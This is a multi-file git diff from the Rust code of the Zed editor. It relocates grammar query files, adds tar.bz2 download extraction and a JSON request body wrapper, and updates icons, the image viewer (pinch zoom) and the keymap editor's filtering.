@item diff --git a/crates/languages/src/yaml/overrides.scm b/crates/grammars/src/yaml/overrides.scm similarity index 98% rename from crates/languages/src/yaml/overrides.scm rename to crates/grammars/src/yaml/overrides.scm index 9503051a62080eb2fdfca3416ef9e5286464dd17..99c991e7d445137dc335275138a8fd68cea31d17 100644 --- a/crates/languages/src/yaml/overrides.scm +++ b/crates/grammars/src/yaml/overrides.scm @@ -1,4 +1,5 @@ (comment) @comment.inclusive + [ (single_quote_scalar) (double_quote_scalar) diff --git a/crates/grammars/src/yaml/redactions.scm b/crates/grammars/src/yaml/redactions.scm new file mode 100644 index 0000000000000000000000000000000000000000..56c7415e70f183afe63950511479e74512ac97f8 --- /dev/null +++ b/crates/grammars/src/yaml/redactions.scm @@ -0,0 +1,2 @@ +(block_mapping_pair + value: (flow_node) @redact) diff --git a/crates/languages/src/yaml/textobjects.scm b/crates/grammars/src/yaml/textobjects.scm similarity index 100% rename from crates/languages/src/yaml/textobjects.scm rename to crates/grammars/src/yaml/textobjects.scm diff --git a/crates/grammars/src/zed-keybind-context/brackets.scm b/crates/grammars/src/zed-keybind-context/brackets.scm new file mode 100644 index 0000000000000000000000000000000000000000..24c20234b639f2afe7754b1d6dceb5685ac7b8e7 --- /dev/null +++ b/crates/grammars/src/zed-keybind-context/brackets.scm @@ -0,0 +1,2 @@ +("(" @open + ")" @close) diff --git a/crates/languages/src/zed-keybind-context/config.toml b/crates/grammars/src/zed-keybind-context/config.toml similarity index 100% rename from crates/languages/src/zed-keybind-context/config.toml rename to crates/grammars/src/zed-keybind-context/config.toml diff --git a/crates/languages/src/zed-keybind-context/highlights.scm b/crates/grammars/src/zed-keybind-context/highlights.scm similarity index 100% rename from crates/languages/src/zed-keybind-context/highlights.scm rename to crates/grammars/src/zed-keybind-context/highlights.scm diff --git 
a/crates/http_client/src/async_body.rs b/crates/http_client/src/async_body.rs index 8fb49f218568ea36078d772a7225229f31a916c4..a59a7339db1e4449b875e2c539e98c86b4279365 100644 --- a/crates/http_client/src/async_body.rs +++ b/crates/http_client/src/async_body.rs @@ -7,6 +7,7 @@ use std::{ use bytes::Bytes; use futures::AsyncRead; use http_body::{Body, Frame}; +use serde::Serialize; /// Based on the implementation of AsyncBody in /// . @@ -88,6 +89,19 @@ impl From<&'static str> for AsyncBody { } } +/// Newtype wrapper that serializes a value as JSON into an `AsyncBody`. +pub struct Json(pub T); + +impl From> for AsyncBody { + fn from(json: Json) -> Self { + Self::from_bytes( + serde_json::to_vec(&json.0) + .expect("failed to serialize JSON") + .into(), + ) + } +} + impl> From> for AsyncBody { fn from(body: Option) -> Self { match body { diff --git a/crates/http_client/src/github.rs b/crates/http_client/src/github.rs index e52e2f1d2555de477cd4597826bc3bd8308faf89..6d2150c8566706188b907e0c9c9ddb8e603f867b 100644 --- a/crates/http_client/src/github.rs +++ b/crates/http_client/src/github.rs @@ -144,6 +144,7 @@ pub async fn get_release_by_tag_name( #[derive(Debug, PartialEq, Eq, Clone, Copy)] pub enum AssetKind { TarGz, + TarBz2, Gz, Zip, } @@ -158,6 +159,7 @@ pub fn build_asset_url(repo_name_with_owner: &str, tag: &str, kind: AssetKind) - "{tag}.{extension}", extension = match kind { AssetKind::TarGz => "tar.gz", + AssetKind::TarBz2 => "tar.bz2", AssetKind::Gz => "gz", AssetKind::Zip => "zip", } diff --git a/crates/http_client/src/github_download.rs b/crates/http_client/src/github_download.rs index 642bbf11c11ce8816a1506c3c4989dce434552d8..47ae2c2b36b1ab37b56ab70735c2ce018bc5e275 100644 --- a/crates/http_client/src/github_download.rs +++ b/crates/http_client/src/github_download.rs @@ -5,7 +5,7 @@ use std::{ }; use anyhow::{Context, Result}; -use async_compression::futures::bufread::GzipDecoder; +use async_compression::futures::bufread::{BzDecoder, GzipDecoder}; use 
futures::{AsyncRead, AsyncSeek, AsyncSeekExt, AsyncWrite, io::BufReader}; use sha2::{Digest, Sha256}; @@ -119,7 +119,7 @@ async fn extract_to_staging( fn staging_path(parent: &Path, asset_kind: AssetKind) -> Result { match asset_kind { - AssetKind::TarGz | AssetKind::Zip => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Zip => { let dir = tempfile::Builder::new() .prefix(".tmp-github-download-") .tempdir_in(parent) @@ -141,7 +141,7 @@ fn staging_path(parent: &Path, asset_kind: AssetKind) -> Result { async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) { match asset_kind { - AssetKind::TarGz | AssetKind::Zip => { + AssetKind::TarGz | AssetKind::TarBz2 | AssetKind::Zip => { if let Err(err) = async_fs::remove_dir_all(staging_path).await { log::warn!("failed to remove staging directory {staging_path:?}: {err:?}"); } @@ -155,6 +155,7 @@ async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) { } async fn finalize_download(staging_path: &Path, destination_path: &Path) -> Result<()> { + _ = async_fs::remove_dir_all(destination_path).await; async_fs::rename(staging_path, destination_path) .await .with_context(|| format!("renaming {staging_path:?} to {destination_path:?}"))?; @@ -169,6 +170,7 @@ async fn stream_response_archive( ) -> Result<()> { match asset_kind { AssetKind::TarGz => extract_tar_gz(destination_path, url, response).await?, + AssetKind::TarBz2 => extract_tar_bz2(destination_path, url, response).await?, AssetKind::Gz => extract_gz(destination_path, url, response).await?, AssetKind::Zip => { util::archive::extract_zip(destination_path, response).await?; @@ -185,6 +187,7 @@ async fn stream_file_archive( ) -> Result<()> { match asset_kind { AssetKind::TarGz => extract_tar_gz(destination_path, url, file_archive).await?, + AssetKind::TarBz2 => extract_tar_bz2(destination_path, url, file_archive).await?, AssetKind::Gz => extract_gz(destination_path, url, file_archive).await?, #[cfg(not(windows))] AssetKind::Zip => { @@ 
-212,6 +215,20 @@ async fn extract_tar_gz( Ok(()) } +async fn extract_tar_bz2( + destination_path: &Path, + url: &str, + from: impl AsyncRead + Unpin, +) -> Result<(), anyhow::Error> { + let decompressed_bytes = BzDecoder::new(BufReader::new(from)); + let archive = async_tar::Archive::new(decompressed_bytes); + archive + .unpack(&destination_path) + .await + .with_context(|| format!("extracting {url} to {destination_path:?}"))?; + Ok(()) +} + async fn extract_gz( destination_path: &Path, url: &str, diff --git a/crates/http_client/src/http_client.rs b/crates/http_client/src/http_client.rs index 5cf25a8277872ba3c6d502565e8057623b267d42..bbbe3b1a832332bd6bee693b4c0b916b4f4c182a 100644 --- a/crates/http_client/src/http_client.rs +++ b/crates/http_client/src/http_client.rs @@ -5,7 +5,7 @@ pub mod github; pub mod github_download; pub use anyhow::{Result, anyhow}; -pub use async_body::{AsyncBody, Inner}; +pub use async_body::{AsyncBody, Inner, Json}; use derive_more::Deref; use http::HeaderValue; pub use http::{self, Method, Request, Response, StatusCode, Uri, request::Builder}; diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index a8a4e47cd0046fa995b10bb5e91b8884d70cdd6d..e29b7d3593025556771d62dc0124786672c540de 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -9,7 +9,6 @@ use strum::{EnumIter, EnumString, IntoStaticStr}; #[strum(serialize_all = "snake_case")] pub enum IconName { AcpRegistry, - Ai, AiAnthropic, AiBedrock, AiClaude, @@ -22,11 +21,13 @@ pub enum IconName { AiOllama, AiOpenAi, AiOpenAiCompat, + AiOpenCode, AiOpenRouter, AiVercel, AiVZero, AiXAi, AiZed, + Archive, ArrowCircle, ArrowDown, ArrowDown10, @@ -52,6 +53,7 @@ pub enum IconName { Book, BookCopy, Box, + BoxOpen, CaseSensitive, Chat, Check, @@ -67,7 +69,6 @@ pub enum IconName { Close, CloudDownload, Code, - Cog, Command, Control, Copilot, @@ -94,6 +95,7 @@ pub enum IconName { DebugStepOver, Diff, DiffSplit, + DiffSplitAuto, DiffUnified, Disconnected, 
Download, @@ -104,7 +106,6 @@ pub enum IconName { EditorSublime, EditorVsCode, Ellipsis, - EllipsisVertical, Envelope, Eraser, Escape, @@ -113,6 +114,7 @@ pub enum IconName { ExpandUp, ExpandVertical, Eye, + EyeOff, FastForward, FastForwardOff, File, @@ -132,6 +134,7 @@ pub enum IconName { Flame, Folder, FolderOpen, + FolderPlus, FolderSearch, Font, FontSize, @@ -147,6 +150,8 @@ pub enum IconName { GitBranchPlus, GitCommit, GitGraph, + GitMergeConflict, + GitWorktree, Github, Hash, HistoryRerun, @@ -170,13 +175,15 @@ pub enum IconName { LockOutlined, MagnifyingGlass, Maximize, + MaximizeAlt, Menu, - MenuAlt, MenuAltTemp, Mic, MicMute, Minimize, + NewThread, Notepad, + OpenFolder, Option, PageDown, PageUp, @@ -191,6 +198,7 @@ pub enum IconName { Power, Public, PullRequest, + QueueMessage, Quote, Reader, RefreshTitle, @@ -210,8 +218,10 @@ pub enum IconName { Send, Server, Settings, - ShieldCheck, Shift, + SignalHigh, + SignalLow, + SignalMedium, Slash, Sliders, Space, @@ -224,26 +234,19 @@ pub enum IconName { Star, StarFilled, Stop, - Supermaven, - SupermavenDisabled, - SupermavenError, - SupermavenInit, - SwatchBook, - SweepAi, - SweepAiDisabled, - SweepAiDown, - SweepAiError, - SweepAiUp, Tab, Terminal, TerminalAlt, - TerminalGhost, TextSnippet, - TextThread, ThinkingMode, ThinkingModeOff, Thread, ThreadFromSummary, + ThreadImport, + ThreadsSidebarLeftClosed, + ThreadsSidebarLeftOpen, + ThreadsSidebarRightClosed, + ThreadsSidebarRightOpen, ThumbsDown, ThumbsUp, TodoComplete, @@ -256,8 +259,6 @@ pub enum IconName { ToolHammer, ToolNotification, ToolPencil, - ToolRead, - ToolRegex, ToolSearch, ToolTerminal, ToolThink, @@ -272,8 +273,6 @@ pub enum IconName { UserRoundPen, Warning, WholeWord, - WorkspaceNavClosed, - WorkspaceNavOpen, XCircle, XCircleFilled, ZedAgent, @@ -286,7 +285,6 @@ pub enum IconName { ZedPredictUp, ZedSrcCustom, ZedSrcExtension, - ZedXCopilot, } impl IconName { diff --git a/crates/image_viewer/Cargo.toml b/crates/image_viewer/Cargo.toml index 
92386e8ba8a38f79711ee50343a6e7cf4a393cbd..8d9df8c9edd194f43c3cd4c157f6c7fecc494de4 100644 --- a/crates/image_viewer/Cargo.toml +++ b/crates/image_viewer/Cargo.toml @@ -26,7 +26,7 @@ log.workspace = true project.workspace = true serde.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git a/crates/image_viewer/src/image_viewer.rs b/crates/image_viewer/src/image_viewer.rs index c223494bd709217439bdff9f6a7ba17e1a65494e..dc8d22b67270a58155c05eaf25cb450166e8eb51 100644 --- a/crates/image_viewer/src/image_viewer.rs +++ b/crates/image_viewer/src/image_viewer.rs @@ -8,23 +8,23 @@ use editor::{EditorSettings, items::entry_git_aware_label_color}; use file_icons::FileIcons; use gpui::{ AnyElement, App, Bounds, Context, DispatchPhase, Element, ElementId, Entity, EventEmitter, - FocusHandle, Focusable, GlobalElementId, InspectorElementId, InteractiveElement, IntoElement, - LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, Pixels, - Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task, WeakEntity, Window, actions, - checkerboard, div, img, point, px, size, + FocusHandle, Focusable, Font, GlobalElementId, InspectorElementId, InteractiveElement, + IntoElement, LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + ParentElement, PinchEvent, Pixels, Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, + Task, WeakEntity, Window, actions, checkerboard, div, img, point, px, size, }; use language::File as _; -use persistence::IMAGE_VIEWER; +use persistence::ImageViewerDb; use project::{ImageItem, Project, ProjectPath, image_store::ImageItemEvent}; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Tooltip, prelude::*}; use util::paths::PathExt; use workspace::{ ItemId, ItemSettings, Pane, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, 
Workspace, WorkspaceId, delete_unloaded_items, invalid_item_view::InvalidItemView, - item::{BreadcrumbText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams}, + item::{HighlightedText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams}, }; pub use crate::image_info::*; @@ -260,6 +260,11 @@ impl ImageView { cx.notify(); } } + + fn handle_pinch(&mut self, event: &PinchEvent, _window: &mut Window, cx: &mut Context) { + let zoom_factor = 1.0 + event.delta; + self.set_zoom(self.zoom_level * zoom_factor, Some(event.position), cx); + } } struct ImageContentElement { @@ -522,15 +527,17 @@ impl Item for ImageView { } } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { let text = breadcrumbs_text_for_image(self.project.read(cx), self.image_item.read(cx), cx); - let settings = ThemeSettings::get_global(cx); + let font = ThemeSettings::get_global(cx).buffer_font.clone(); - Some(vec![BreadcrumbText { - text, - highlights: None, - font: Some(settings.buffer_font.clone()), - }]) + Some(( + vec![HighlightedText { + text: text.into(), + highlights: vec![], + }], + Some(font), + )) } fn can_split(&self) -> bool { @@ -590,8 +597,9 @@ impl SerializableItem for ImageView { window: &mut Window, cx: &mut App, ) -> Task>> { + let db = ImageViewerDb::global(cx); window.spawn(cx, async move |cx| { - let image_path = IMAGE_VIEWER + let image_path = db .get_image_path(item_id, workspace_id)? 
.context("No image path found")?; @@ -624,13 +632,8 @@ impl SerializableItem for ImageView { _window: &mut Window, cx: &mut App, ) -> Task> { - delete_unloaded_items( - alive_items, - workspace_id, - "image_viewers", - &IMAGE_VIEWER, - cx, - ) + let db = ImageViewerDb::global(cx); + delete_unloaded_items(alive_items, workspace_id, "image_viewers", &db, cx) } fn serialize( @@ -644,12 +647,11 @@ impl SerializableItem for ImageView { let workspace_id = workspace.database_id()?; let image_path = self.image_item.read(cx).abs_path(cx)?; + let db = ImageViewerDb::global(cx); Some(cx.background_spawn({ async move { log::debug!("Saving image at path {image_path:?}"); - IMAGE_VIEWER - .save_image_path(item_id, workspace_id, image_path) - .await + db.save_image_path(item_id, workspace_id, image_path).await } })) } @@ -679,8 +681,8 @@ impl Render for ImageView { .size_full() .relative() .bg(cx.theme().colors().editor_background) - .child( - div() + .child({ + let container = div() .id("image-container") .size_full() .overflow_hidden() @@ -690,13 +692,16 @@ impl Render for ImageView { gpui::CursorStyle::OpenHand }) .on_scroll_wheel(cx.listener(Self::handle_scroll_wheel)) + .on_pinch(cx.listener(Self::handle_pinch)) .on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down)) .on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down)) .on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up)) .on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up)) .on_mouse_move(cx.listener(Self::handle_mouse_move)) - .child(ImageContentElement::new(cx.entity())), - ) + .child(ImageContentElement::new(cx.entity())); + + container + }) } } @@ -878,7 +883,7 @@ mod persistence { )]; } - db::static_connection!(IMAGE_VIEWER, ImageViewerDb, [WorkspaceDb]); + db::static_connection!(ImageViewerDb, [WorkspaceDb]); impl ImageViewerDb { query! 
{ diff --git a/crates/inspector_ui/Cargo.toml b/crates/inspector_ui/Cargo.toml index 53d2f74b9c663496da083152ead17d479f5030eb..ec1f01195c82366a48a1ffa46397c6ce91ea6339 100644 --- a/crates/inspector_ui/Cargo.toml +++ b/crates/inspector_ui/Cargo.toml @@ -21,7 +21,7 @@ language.workspace = true project.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true util_macros.workspace = true diff --git a/crates/inspector_ui/src/div_inspector.rs b/crates/inspector_ui/src/div_inspector.rs index a7616e134a16bbe2b96a6d23d20453b9a5ee4e5f..7ec2d7ba8303e899331d3f38642a9a51f4c14d4c 100644 --- a/crates/inspector_ui/src/div_inspector.rs +++ b/crates/inspector_ui/src/div_inspector.rs @@ -1,7 +1,6 @@ use anyhow::{Result, anyhow}; use editor::{ - Bias, CompletionProvider, Editor, EditorEvent, EditorMode, ExcerptId, MinimapVisibility, - MultiBuffer, + Bias, CompletionProvider, Editor, EditorEvent, EditorMode, MinimapVisibility, MultiBuffer, }; use fuzzy::StringMatch; use gpui::{ @@ -641,7 +640,6 @@ struct RustStyleCompletionProvider { impl CompletionProvider for RustStyleCompletionProvider { fn completions( &self, - _excerpt_id: ExcerptId, buffer: &Entity, position: Anchor, _: editor::CompletionContext, diff --git a/crates/inspector_ui/src/inspector.rs b/crates/inspector_ui/src/inspector.rs index 3c90bd7d6c6d550140df85c4c7547bd5b5700149..b687ea70a57d0f1b8ea97e4767d98eb701b77080 100644 --- a/crates/inspector_ui/src/inspector.rs +++ b/crates/inspector_ui/src/inspector.rs @@ -57,7 +57,7 @@ fn render_inspector( window: &mut Window, cx: &mut Context, ) -> AnyElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let colors = cx.theme().colors(); let inspector_id = inspector.active_element_id(); let toolbar_height = platform_title_bar_height(window); diff --git a/crates/journal/src/journal.rs 
b/crates/journal/src/journal.rs index ba97bcf66a77659fb3196ba45ebb3f831452e008..b8028c79b3d5da415a52d946d7601d8cbb40f738 100644 --- a/crates/journal/src/journal.rs +++ b/crates/journal/src/journal.rs @@ -9,7 +9,7 @@ use std::{ path::{Path, PathBuf}, sync::Arc, }; -use workspace::{AppState, OpenVisible, Workspace}; +use workspace::{AppState, OpenResult, OpenVisible, Workspace}; actions!( journal, @@ -107,7 +107,10 @@ pub fn new_journal_entry(workspace: &Workspace, window: &mut Window, cx: &mut Ap .spawn(cx, async move |cx| { let (journal_dir, entry_path) = create_entry.await?; let opened = if open_new_workspace { - let (new_workspace, _) = cx + let OpenResult { + window: new_workspace, + .. + } = cx .update(|_window, cx| { workspace::open_paths( &[journal_dir], diff --git a/crates/json_schema_store/src/json_schema_store.rs b/crates/json_schema_store/src/json_schema_store.rs index 756f64b2fb1bac13fc6d2868989504a3f8241281..c13f42f9bb7d92b7c136815f720abfe6ec6faac3 100644 --- a/crates/json_schema_store/src/json_schema_store.rs +++ b/crates/json_schema_store/src/json_schema_store.rs @@ -67,25 +67,22 @@ pub fn init(cx: &mut App) { .detach(); if let Some(extension_events) = extension::ExtensionEvents::try_global(cx) { - cx.subscribe(&extension_events, move |_, evt, cx| { - match evt { - extension::Event::ExtensionInstalled(_) - | extension::Event::ExtensionUninstalled(_) - | extension::Event::ConfigureExtensionRequested(_) => return, - extension::Event::ExtensionsInstalledChanged => {} + cx.subscribe(&extension_events, move |_, evt, cx| match evt { + extension::Event::ExtensionsInstalledChanged => { + cx.update_global::(|schema_store, cx| { + schema_store.notify_schema_changed(ChangedSchemas::Settings, cx); + }); } - cx.update_global::(|schema_store, cx| { - schema_store.notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}settings"), cx); - schema_store - .notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}project_settings"), cx); - }); + 
extension::Event::ExtensionUninstalled(_) + | extension::Event::ExtensionInstalled(_) + | extension::Event::ConfigureExtensionRequested(_) => {} }) .detach(); } cx.observe_global::(move |cx| { cx.update_global::(|schema_store, cx| { - schema_store.notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}debug_tasks"), cx); + schema_store.notify_schema_changed(ChangedSchemas::DebugTasks, cx); }); }) .detach(); @@ -98,18 +95,42 @@ pub struct SchemaStore { impl gpui::Global for SchemaStore {} +enum ChangedSchemas { + Settings, + DebugTasks, +} + impl SchemaStore { - fn notify_schema_changed(&mut self, uri: &str, cx: &mut App) { - DYNAMIC_SCHEMA_CACHE.write().remove(uri); + fn notify_schema_changed(&mut self, changed_schemas: ChangedSchemas, cx: &mut App) { + let uris_to_invalidate = match changed_schemas { + ChangedSchemas::Settings => { + let settings_uri_prefix = &format!("{SCHEMA_URI_PREFIX}settings"); + let project_settings_uri = &format!("{SCHEMA_URI_PREFIX}project_settings"); + DYNAMIC_SCHEMA_CACHE + .write() + .extract_if(|uri, _| { + uri == project_settings_uri || uri.starts_with(settings_uri_prefix) + }) + .map(|(url, _)| url) + .collect() + } + ChangedSchemas::DebugTasks => DYNAMIC_SCHEMA_CACHE + .write() + .remove_entry(&format!("{SCHEMA_URI_PREFIX}debug_tasks")) + .map_or_else(Vec::new, |(uri, _)| vec![uri]), + }; + + if uris_to_invalidate.is_empty() { + return; + } - let uri = uri.to_string(); self.lsp_stores.retain(|lsp_store| { let Some(lsp_store) = lsp_store.upgrade() else { return false; }; - project::lsp_store::json_language_server_ext::notify_schema_changed( + project::lsp_store::json_language_server_ext::notify_schemas_changed( lsp_store, - uri.clone(), + &uris_to_invalidate, cx, ); true @@ -238,7 +259,8 @@ async fn resolve_dynamic_schema( (adapter_name, LspSchemaKind::Settings) } else { anyhow::bail!( - "Invalid LSP schema path: expected '{{adapter}}/initialization_options' or '{{adapter}}/settings', got '{}'", + "Invalid LSP schema path: \ + Expected 
'{{adapter}}/initialization_options' or '{{adapter}}/settings', got '{}'", lsp_path ); }; @@ -484,7 +506,7 @@ pub fn all_schema_file_associations( let file_name = normalized_action_name_to_file_name(normalized_name.clone()); serde_json::json!({ "fileMatch": [file_name], - "url": format!("{}action/{normalized_name}", SCHEMA_URI_PREFIX) + "url": format!("{SCHEMA_URI_PREFIX}action/{normalized_name}") }) })); diff --git a/crates/keymap_editor/Cargo.toml b/crates/keymap_editor/Cargo.toml index 33ba95ddd6d8df7efe2f551451af0340d83369c7..63bfba05d4e12251a9a267984dabc7420a8c7577 100644 --- a/crates/keymap_editor/Cargo.toml +++ b/crates/keymap_editor/Cargo.toml @@ -36,6 +36,7 @@ settings.workspace = true telemetry.workspace = true tempfile.workspace = true theme.workspace = true +theme_settings.workspace = true tree-sitter-json.workspace = true tree-sitter-rust.workspace = true ui_input.workspace = true diff --git a/crates/keymap_editor/src/action_completion_provider.rs b/crates/keymap_editor/src/action_completion_provider.rs index 98428baeb2f7b419ba7354130e12f1a4710c8aea..10d977572b9c52cba1ad9d87c7035bd1552d5e33 100644 --- a/crates/keymap_editor/src/action_completion_provider.rs +++ b/crates/keymap_editor/src/action_completion_provider.rs @@ -26,7 +26,6 @@ impl ActionCompletionProvider { impl CompletionProvider for ActionCompletionProvider { fn completions( &self, - _excerpt_id: editor::ExcerptId, buffer: &Entity, buffer_position: language::Anchor, _trigger: editor::CompletionContext, diff --git a/crates/keymap_editor/src/keymap_editor.rs b/crates/keymap_editor/src/keymap_editor.rs index ff3389a4d4a10bc8472d0931d18ffa5be839c631..ee9f6a11c2b51f7993b17c01352cfb97b535049a 100644 --- a/crates/keymap_editor/src/keymap_editor.rs +++ b/crates/keymap_editor/src/keymap_editor.rs @@ -24,22 +24,23 @@ use gpui::{ actions, anchored, deferred, div, }; use language::{Language, LanguageConfig, ToOffset as _}; + use notifications::status_toast::{StatusToast, ToastIcon}; use 
project::{CompletionDisplayOptions, Project}; use settings::{ BaseKeymap, KeybindSource, KeymapFile, Settings as _, SettingsAssets, infer_json_indent_size, }; use ui::{ - ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, Indicator, - Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section, - SharedString, Styled as _, Table, TableColumnWidths, TableInteractionState, - TableResizeBehavior, Tooltip, Window, prelude::*, + ActiveTheme as _, App, Banner, BorrowAppContext, ColumnWidthConfig, ContextMenu, + IconButtonShape, IconPosition, Indicator, Modal, ModalFooter, ModalHeader, ParentElement as _, + PopoverMenu, RedistributableColumnsState, Render, Section, SharedString, Styled as _, Table, + TableInteractionState, TableResizeBehavior, Tooltip, Window, prelude::*, }; use ui_input::InputField; use util::ResultExt; use workspace::{ Item, ModalView, SerializableItem, Workspace, notifications::NotifyTaskExt as _, - register_serializable_item, + register_serializable_item, with_active_or_new_workspace, }; pub use ui_components::*; @@ -47,7 +48,7 @@ use zed_actions::{ChangeKeybinding, OpenKeymap}; use crate::{ action_completion_provider::ActionCompletionProvider, - persistence::KEYBINDING_EDITORS, + persistence::KeybindingEditorDb, ui_components::keystroke_input::{ ClearKeystrokes, KeystrokeInput, StartRecording, StopRecording, }, @@ -73,6 +74,8 @@ actions!( CopyContext, /// Toggles Conflict Filtering ToggleConflictFilter, + /// Toggles whether NoAction bindings are shown + ToggleNoActionBindings, /// Toggle Keystroke search ToggleKeystrokeSearch, /// Toggles exact matching for keystroke search @@ -126,14 +129,16 @@ pub fn init(cx: &mut App) { } } + cx.on_action(|_: &OpenKeymap, cx| { + with_active_or_new_workspace(cx, |workspace, window, cx| { + open_keymap_editor(None, workspace, window, cx); + }); + }); + cx.observe_new(|workspace: &mut Workspace, _window, _cx| { - workspace - .register_action(|workspace, _: 
&OpenKeymap, window, cx| { - open_keymap_editor(None, workspace, window, cx); - }) - .register_action(|workspace, action: &ChangeKeybinding, window, cx| { - open_keymap_editor(Some(action.action.clone()), workspace, window, cx); - }); + workspace.register_action(|workspace, action: &ChangeKeybinding, window, cx| { + open_keymap_editor(Some(action.action.clone()), workspace, window, cx); + }); }) .detach(); @@ -183,7 +188,7 @@ impl KeymapEventChannel { } } -#[derive(Default, PartialEq)] +#[derive(Default, PartialEq, Copy, Clone)] enum SearchMode { #[default] Normal, @@ -224,6 +229,25 @@ impl FilterState { } } +#[derive(Default, PartialEq, Eq, Copy, Clone)] +struct SourceFilters { + user: bool, + zed_defaults: bool, + vim_defaults: bool, +} + +impl SourceFilters { + fn allows(&self, source: Option) -> bool { + match source { + Some(KeybindSource::User) => self.user, + Some(KeybindSource::Vim) => self.vim_defaults, + Some(KeybindSource::Base | KeybindSource::Default | KeybindSource::Unknown) | None => { + self.zed_defaults + } + } + } +} + #[derive(Debug, Default, PartialEq, Eq, Clone, Hash)] struct ActionMapping { keystrokes: Rc<[KeybindingKeystroke]>, @@ -412,6 +436,8 @@ struct KeymapEditor { keybindings: Vec, keybinding_conflict_state: ConflictState, filter_state: FilterState, + source_filters: SourceFilters, + show_no_action_bindings: bool, search_mode: SearchMode, search_query_debounce: Option>, // corresponds 1 to 1 with keybindings @@ -424,7 +450,7 @@ struct KeymapEditor { context_menu: Option<(Entity, Point, Subscription)>, previous_edit: Option, humanized_action_names: HumanizedActionNameCache, - current_widths: Entity, + current_widths: Entity, show_hover_menus: bool, actions_with_schemas: HashSet<&'static str>, /// In order for the JSON LSP to run in the actions arguments editor, we @@ -477,13 +503,48 @@ fn keystrokes_match_exactly( }) } +fn disabled_binding_matches_context( + disabled_binding: &gpui::KeyBinding, + binding: &gpui::KeyBinding, +) -> bool { + 
match ( + disabled_binding.predicate().as_deref(), + binding.predicate().as_deref(), + ) { + (None, _) => true, + (Some(_), None) => false, + (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate), + } +} + +fn binding_is_unbound_by_unbind( + binding: &gpui::KeyBinding, + binding_index: usize, + all_bindings: &[&gpui::KeyBinding], +) -> bool { + all_bindings[binding_index + 1..] + .iter() + .rev() + .any(|disabled_binding| { + gpui::is_unbind(disabled_binding.action()) + && keystrokes_match_exactly(disabled_binding.keystrokes(), binding.keystrokes()) + && disabled_binding + .action() + .as_any() + .downcast_ref::() + .is_some_and(|unbind| unbind.0.as_ref() == binding.action().name()) + && disabled_binding_matches_context(disabled_binding, binding) + }) +} + impl KeymapEditor { fn new(workspace: WeakEntity, window: &mut Window, cx: &mut Context) -> Self { let _keymap_subscription = cx.observe_global_in::(window, Self::on_keymap_changed); let table_interaction_state = cx.new(|cx| { - TableInteractionState::new(cx) - .with_custom_scrollbar(ui::Scrollbars::for_settings::()) + TableInteractionState::new(cx).with_custom_scrollbar(ui::Scrollbars::for_settings::< + editor::EditorSettingsScrollbarProxy, + >()) }); let keystroke_editor = cx.new(|cx| { @@ -539,6 +600,12 @@ impl KeymapEditor { keybindings: vec![], keybinding_conflict_state: ConflictState::default(), filter_state: FilterState::default(), + source_filters: SourceFilters { + user: true, + zed_defaults: true, + vim_defaults: true, + }, + show_no_action_bindings: true, search_mode: SearchMode::default(), string_match_candidates: Arc::new(vec![]), matches: vec![], @@ -556,7 +623,27 @@ impl KeymapEditor { actions_with_schemas: HashSet::default(), action_args_temp_dir: None, action_args_temp_dir_worktree: None, - current_widths: cx.new(|cx| TableColumnWidths::new(COLS, cx)), + current_widths: cx.new(|_cx| { + RedistributableColumnsState::new( + COLS, + vec![ + 
DefiniteLength::Absolute(AbsoluteLength::Pixels(px(36.))), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.20), + DefiniteLength::Fraction(0.14), + DefiniteLength::Fraction(0.45), + DefiniteLength::Fraction(0.08), + ], + vec![ + TableResizeBehavior::None, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + ], + ) + }), }; this.on_keymap_changed(window, cx); @@ -637,6 +724,11 @@ impl KeymapEditor { ) .await; this.update(cx, |this, cx| { + matches.retain(|candidate| { + this.source_filters + .allows(this.keybindings[candidate.candidate_id].keybind_source()) + }); + match this.filter_state { FilterState::Conflicts => { matches.retain(|candidate| { @@ -695,6 +787,10 @@ impl KeymapEditor { SearchMode::Normal => {} } + if !this.show_no_action_bindings { + matches.retain(|item| !this.keybindings[item.candidate_id].is_no_action()); + } + if action_query.is_empty() { matches.sort_by(|item1, item2| { let binding1 = &this.keybindings[item1.candidate_id]; @@ -729,7 +825,7 @@ impl KeymapEditor { ) { let key_bindings_ptr = cx.key_bindings(); let lock = key_bindings_ptr.borrow(); - let key_bindings = lock.bindings(); + let key_bindings = lock.bindings().collect::>(); let mut unmapped_action_names = HashSet::from_iter(cx.all_action_names().iter().copied()); let action_documentation = cx.action_documentation(); let mut generator = KeymapFile::action_schema_generator(); 